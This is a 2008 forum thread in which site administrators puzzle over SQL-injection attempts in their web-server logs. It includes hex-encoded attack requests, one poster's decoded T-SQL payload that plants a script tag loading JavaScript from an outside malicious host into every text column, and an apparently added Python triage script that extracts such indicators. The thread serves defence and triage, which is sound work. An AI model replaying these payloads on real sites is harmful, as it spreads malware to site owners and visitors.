Apparent attack in web server log

August 23, 2008, 08:49:41 pm #0
jt

Apparent attack in web server log

I am seeing many instances of logs that look like this:
Quote
98.225.77.233 - - [23/Aug/2008:21:43:44 -0400] "GET /node/400?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283
430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E732062
20776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653
D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920
424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636
E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542
C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 8767 "-" "Mozilla/4.0 (compatible;
 MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
98.225.77.233 - - [23/Aug/2008:21:43:44 -0400] "GET /node/400?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861722834
30303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622
0776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D
31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D3029204
24547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E
2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D2268747
4703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C
404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 8767 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"

Any idea if I should be worried?  The site is running Drupal.
August 23, 2008, 09:33:02 pm #1
mutex

Re: Apparent attack in web server log

I see a lot of them in my logs as well.  I have noticed that these "attacks" are tripping suhosin, so I don't know if the attack would have been successful or not.  I hope it would not.  Here is what I saw just a few minutes ago:
Quote
123.5.140.122 - - [23/Aug/2008:22:27:40 -0400] "GET /tag/search-engine/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861722834303030292044
45434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C7379736
36F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F72
20622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375727
36F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B
40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F736372697
0743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F
777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736
F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 22451 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CNCDialer)"
123.5.140.122 - - [23/Aug/2008:22:27:40 -0400] "GET /tag/search-engine/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204
445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973
636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7
220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572
736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272
B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F73637269
70743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2
F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F43757273
6F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 22451 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CNCDialer)"
In my /var/log/messages file, I see this:
Quote
Aug 23 22:27:40 www2 suhosin[27142]: ALERT - configured GET variable value length limit exceeded - dropped variable ';DECLARE @S CHAR(4000);SET @S' (attacker '123.5.140.122', file 'XXXXXXXX/index.php')
Aug 23 22:27:40 www2 suhosin[26345]: ALERT - configured GET variable value length limit exceeded - dropped variable '';DECLARE @S CHAR(4000);SET @S' (attacker '123.5.140.122', file 'XXXXXXXXXXX/index.php')

If you are not using suhosin already, it seems like a pragmatic step to install it.  I don't know of a good way to block these.  They appear to be originating from random sources - probably coming from botnets, so firewall rules would not be very effective.
« Last Edit: August 25, 2008, 08:32:14 pm by mutex »
August 25, 2008, 02:11:08 pm #2
chadlepto

Re: Apparent attack in web server log

http://web-robot-abuse.blogspot.com/2008/08/latest-hack-running-right-now-is.html
http://isc.sans.org/diary.html?storyid=4771
http://isc.sans.org/diary.html?storyid=4294

This is what it is:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

From my logs:
« Last Edit: August 25, 2008, 08:33:03 pm by mutex »
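As an added example (not code from any poster in this thread), here is a small Python triage script that does what chadlepto did by hand: it pulls the CAST(0x... AS CHAR) literal out of an access-log request line, URL-decodes it, turns the hex back into the T-SQL, and lists the script URLs the payload tries to splice into every text column, which is what you would feed into a blocklist or a search of your own tables. The log line it runs on is constructed here with the same structure as the ones posted above; the domain is a placeholder standing in for the real script host.

```python
import re
from urllib.parse import unquote

# Apache/NCSA request line: "GET /path?query HTTP/1.1" -> capture /path?query.
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')
# The stacked T-SQL seen in the thread: CAST(0x<hex> AS CHAR(4000));EXEC(@S)
CAST_RE = re.compile(r'CAST\(0x([0-9A-Fa-f]+)\s+AS\s+CHAR\(\d+\)\)\s*;\s*EXEC\(@S\)', re.I)
SCRIPT_RE = re.compile(r'<script src="([^"]+)">', re.I)


def decode_hex_sql(query):
    """Return the T-SQL hidden in the hex literal, or None if the query lacks it."""
    m = CAST_RE.search(unquote(query))
    if not m:
        return None
    try:
        return bytes.fromhex(m.group(1)).decode('latin-1')
    except ValueError:  # odd-length hex: payload truncated in the log, nothing to decode
        return None


def triage(line):
    """Classify one access-log line; None when it is not this injection pattern."""
    m = REQ_RE.search(line)
    if not m:
        return None
    sql = decode_hex_sql(m.group(1))
    if sql is None:
        return None
    return {
        'client': line.split()[0],
        'path': m.group(1).split('?', 1)[0],
        'injected_src': sorted(set(SCRIPT_RE.findall(sql))),  # IoCs to block / hunt for
        'sql': sql,
    }


# Constructed sample: same shape as the decoded payload above, placeholder host.
_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "exec('update ['+@T+'] set ['+@C+']=''\"></title><script src=\"http://malware.example/w.js\">"
    "</script><!--''+['+@C+'] where '+@C+' not like ''%\"></title>"
    "<script src=\"http://malware.example/w.js\"></script><!--''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
SAMPLE_LOG = (
    '198.51.100.7 - - [23/Aug/2008:21:43:44 -0400] "GET /node/400?%27;DECLARE%20@S%20CHAR(4000);'
    'SET%20@S=CAST(0x' + _SQL.encode('latin-1').hex().upper() + '%20AS%20CHAR(4000));EXEC(@S); '
    'HTTP/1.1" 200 8767 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"'
)

if __name__ == '__main__':
    print(triage(SAMPLE_LOG))
```

Run it over a whole access log with `for line in open(path): r = triage(line)` and collect the distinct `injected_src` values; a 200 response to such a request, as in the lines above, only says the page rendered, not whether the EXEC ran.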
August 25, 2008, 08:23:20 pm #3
mutex

Re: Apparent attack in web server log

chad,

Thanks much for the links.  That was quite helpful.
September 07, 2008, 01:03:14 pm #4
Vino

Re: Apparent attack in web server log

My website has fallen prey to this attack, and I'm trying to now figure out how to remove the vulnerability. I found the part in the log where they injected the SQL. My logs are filled with crap like this:

2008-08-26 01:07:20 W3SVC21647 EON 67.210.107.55 GET /events/buytickets.aspx ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520 -- SNIP -- 54452054616F72%20AS%20CHAR(4000));EXEC(@S); 80 - 70.252.13.239 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+1.1.4322;+Hotbar+10.0.356.0) - - www.whitetigertkd.com 302 0 0 418 1575 890

So they are visiting this URL (among others)

http://www.whitetigertkd.com/events/buytickets.aspx?';DECLARE @S CHAR(4000);SET @S=CAST(0x--etc etc

I snipped out a bunch of hex that converts to what the gentleman above posted. There are tons of these calls all over the website, and it doesn't look like it's exploiting un-escaped inputs in my website, like what usually happens with SQL injections. It simply dumps a bunch of SQL into the URI and executes it. How is this shit getting into my database? I'm more of a Linux guy so I'm not an expert on ASPX and IIS, but I was expecting to see something like, "buytickets.aspx?name=a'%3B%20drop%20table%20users%3B--" where it actually tries to exploit an un-escaped input. Moreover, the IP of the invader changes with every attempt, leading me to believe he is using a botnet, so I can't simply ban his IP.

So the question is, how do I remove the vulnerability?
September 07, 2008, 01:47:36 pm #5
mutex

Re: Apparent attack in web server log

These attacks are extremely widespread right now. Some of them appear to be generic SQL stuffing, others are php code execution techniques. I would be mindful that you may not be seeing the actual attack that was successful against your site and not just 'noise'.

In concept, whether php, asp, or whatever language, strict parameter scrubbing needs to happen - or better yet, a translation of submitted parameters to variables that are used for database calls.

I am not a windows/IIS person, either, so I'm not able to offer good specific advice on removing the vulnerability.
September 08, 2008, 12:22:14 am #6
Vino

Re: Apparent attack in web server log

Yes, I saw this all over my logs. I doubt that is the actual point of compromise, but it does essentially the same thing all over the site. However, they're all the same, and I don't understand how using this kind of thing is actually getting privilege to run SQL code. It doesn't try to hijack any SQL input variables like a typical SQL injection attack would. It just does:

http://www.whitetigertkd.com/events/buytickets.aspx?';SQL CODE HERE

How on earth does that actually work?!? Everywhere on the internet that mentions this issue it just says "Be sure to secure your server." I would if I could figure out how the thing works.